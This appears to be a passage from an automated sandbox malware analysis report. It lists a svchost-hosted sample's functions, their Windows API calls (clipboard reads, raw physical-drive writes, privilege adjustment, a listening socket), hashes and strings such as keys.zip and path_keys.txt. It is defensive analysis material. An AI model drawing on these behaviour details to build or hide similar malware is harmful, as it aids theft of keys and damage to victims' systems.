                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F012B4101300AEEB59CF21D65DF9937D1AB453A5F4AD0C9D0044F562D775C44ADF50
                                                                                                                                                                                                                Function 02BB72E0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02BCFDFB,C0000000,00000003,00000000,00000002,00000080,00000000,?,02BD561D), ref: 02BB72F4
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$ConvertCreateFileFreeInfoLocalNamedSaclString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2757955739-0
                                                                                                                                                                                                                • Opcode ID: 19f15d6215f6e950813dab542aa74d8e5ef045067cfdbc376132b86da6991d4f
                                                                                                                                                                                                                • Instruction ID: a5f6ba2d0ff7bb7be90bb30645b548ab39aad344b15b3b9b5124b562acdf7b3d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19f15d6215f6e950813dab542aa74d8e5ef045067cfdbc376132b86da6991d4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBD012317C022035F07221283D4BFEA54554745F75F614751FBA4BF1C096D4184216D4

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 02BBD300 Relevance: 103.7, APIs: 55, Strings: 4, Instructions: 429windowsynchronizationmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 02BBD35F
                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02BBD36A
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD37D
                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 02BBD392
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD3A1
                                                                                                                                                                                                                • SetWindowTextA.USER32(?,-00000008), ref: 02BBD3AD
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD3BC
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD3C7
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD3DA
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 02BBD418
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD428
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD437
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02BBD44F
                                                                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 02BBD459
                                                                                                                                                                                                                • CreateFontIndirectA.GDI32 ref: 02BBD46F
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02BBD47F
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BBD4B7
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BBD4BA
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02BBD4CE
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 02BBD533
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02BBD55D
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 02BBD569
                                                                                                                                                                                                                • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02BBD585
                                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02BBD5AA
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02BBD5BC
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD5C5
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD5D4
                                                                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 02BBD5DB
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02BBD5EF
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02BBD613
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02BBD620
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 02BBD630
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000DE), ref: 02BBD64C
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000F2), ref: 02BBD655
                                                                                                                                                                                                                • LoadIconA.USER32(00000000,00007F00), ref: 02BBD661
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02BBD67B
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD6A4
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD6B3
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD6C6
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02BBD6E9
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 02BBD707
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000001), ref: 02BBD714
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD723
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBD73B
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBD748
                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 02BBD7B7
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000), ref: 02BBD7BE
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD7CE
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBD7E8
                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 02BBD7FD
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD80C
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 02BBD818
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BBD827
                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 02BBD82E
                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 02BBD843
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                                • String ID: '$<$P0Wu$static
                                                                                                                                                                                                                • API String ID: 2592195760-2115307949
                                                                                                                                                                                                                • Opcode ID: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                                • Instruction ID: bbe77d3bf8c27a51baf993195a4ebad47598fbc2af0b58c3bc250a8c02e394a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E1C471984301AFD7A18F68EC88F7A37A8EF887A2F540A08F755E72C5C7B49451CB61
                                                                                                                                                                                                                Function 02BD2BB0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 379COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD2BCE
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD2BE8
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2C12
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD2C37
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD2C77
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD2C81
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2C89
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BD2C9A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD2CA1
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 02BD2CE4
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02BD2D30
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752,00000000,00000000), ref: 02BD2D77
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                                • API String ID: 1576442920-4273285962
                                                                                                                                                                                                                • Opcode ID: 8b3a4a29c68bd7f683530068166c8a8f3716185f673b88743bbc8a41f01edccc
                                                                                                                                                                                                                • Instruction ID: dd60c5284d994a9b00b817e2fc5497e8ff43cbc09e91c6cebe123f8da4634dab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b3a4a29c68bd7f683530068166c8a8f3716185f673b88743bbc8a41f01edccc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0D146309043899FDB258F38D858BEA7BE5EF45340F1485D5EDCAD7242EB70A989CB90
                                                                                                                                                                                                                Function 02BDDA50 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 297stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                                • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                • API String ID: 2246752426-2295261572
                                                                                                                                                                                                                • Opcode ID: 36e8d765793c57efd28a0b87345c34c153d049a896611a3a999649836eea5e61
                                                                                                                                                                                                                • Instruction ID: d08d8d2f7da387c731888194a9b3b5105c60de4fc3fd2da1127c0567850c4d55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e8d765793c57efd28a0b87345c34c153d049a896611a3a999649836eea5e61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4A14873A4021A9FDB21CB24CC54FEA7775EF85304F1486D4EB899B180E771AA49CBA0
                                                                                                                                                                                                                Function 02BC3220 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC323D
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 02BC325E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC327F
                                                                                                                                                                                                                • GetGUIThreadInfo.USER32(00000000), ref: 02BC3286
                                                                                                                                                                                                                • GetOpenClipboardWindow.USER32 ref: 02BC329C
                                                                                                                                                                                                                • GetActiveWindow.USER32 ref: 02BC32AA
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02BC32D8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02BC32FA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC3301
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC3311
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02BC332E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC337B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC337E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC338B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC338E
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02BC3399
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02BC33DF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 3472172748-4108050209
                                                                                                                                                                                                                • Opcode ID: ce771464a92efe3e0ea6eb021d9978e93016318daa225127e5b72e7337e90ee6
                                                                                                                                                                                                                • Instruction ID: 2e0d8ccb9017695ace6d1db410fb8df522b4afeb8221c5ebe70c673978bece36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce771464a92efe3e0ea6eb021d9978e93016318daa225127e5b72e7337e90ee6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF513431604302ABD7209B689C4CF6B7BE8EFC6754FA0879CFA8597280DF20D90487A5
                                                                                                                                                                                                                Function 02BB2BA0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocfree$exit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 337157181-0
                                                                                                                                                                                                                • Opcode ID: d261e695fca6be96c204ac4bd0052be9edc10d39a0ae5c4d8e041d3f7c0048e4
                                                                                                                                                                                                                • Instruction ID: 7247ca8674091cf6db36704a8b00b6e6719b6b4cc981d7e33b820a8d1f2cbc19
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d261e695fca6be96c204ac4bd0052be9edc10d39a0ae5c4d8e041d3f7c0048e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1F18AB5A002099BDB22CF58D884BFEB7B5FF88314F1445A9ED05AB350D7B1E951CBA0
                                                                                                                                                                                                                Function 02BC33F0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC3411
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3428
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3438
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3465
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02BC3487
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,75569300), ref: 02BC34B1
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34C0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02BC34D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34EA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC3507
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC3518
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                                • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                                • API String ID: 649538874-3292898883
                                                                                                                                                                                                                • Opcode ID: 1b2319bc4ad4516f6563c57154d697d0e3a433520ff41a897661130b05d71d0f
                                                                                                                                                                                                                • Instruction ID: 4518520684267868edd14f9b80bf53e196f5528e4f79625e5a1aafec854a698c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b2319bc4ad4516f6563c57154d697d0e3a433520ff41a897661130b05d71d0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68310171A81214BBE7309B649C49FEE77ACDF01B14FA086C8F744AA0C0C7F05A908BE0
                                                                                                                                                                                                                Function 02BDDAE8 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 135filestringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02BDDB7A
                                                                                                                                                                                                                • strchr.MSVCRT ref: 02BDDB89
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02BDDC75
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 02BDDC89
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                                • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                • API String ID: 23527507-2295261572
                                                                                                                                                                                                                • Opcode ID: 2349119abb691fe0ae602ba3ead7e79c21212c34da9570b97533c40d44adb318
                                                                                                                                                                                                                • Instruction ID: ad70e44f3b71b1e1a38c8676d30d7e725213cebfc9182873749972113acc08a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2349119abb691fe0ae602ba3ead7e79c21212c34da9570b97533c40d44adb318
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5415A3390065B9FEF358B24CC547FA7BA1EB42308F1446E5DACA97180F771AA85CB51
                                                                                                                                                                                                                Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                • API String ID: 731831024-2333288578
                                                                                                                                                                                                                • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                                • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                                Function 02BE1250 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BE1278
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02BE128E
                                                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 02BE12A8
                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 02BE12B3
                                                                                                                                                                                                                • bind.WS2_32(00000000,?,00000010), ref: 02BE12CB
                                                                                                                                                                                                                • listen.WS2_32(00000000,00000005), ref: 02BE12D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4126956815-0
                                                                                                                                                                                                                • Opcode ID: 7b8ec8a6cdc7389f4e40b4d05794fef32db1ea257d2baf20bd2406e59577d5be
                                                                                                                                                                                                                • Instruction ID: d5deee60bac56d2ce315931e52385060e862402b9a849b33671bf675a8a5858a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b8ec8a6cdc7389f4e40b4d05794fef32db1ea257d2baf20bd2406e59577d5be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7011C231B50209ABDB209B68EC09FEF7778AF04751F504255FF05EB2C1EBB09A148BA1
                                                                                                                                                                                                                Function 02BD2B40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD2B5E
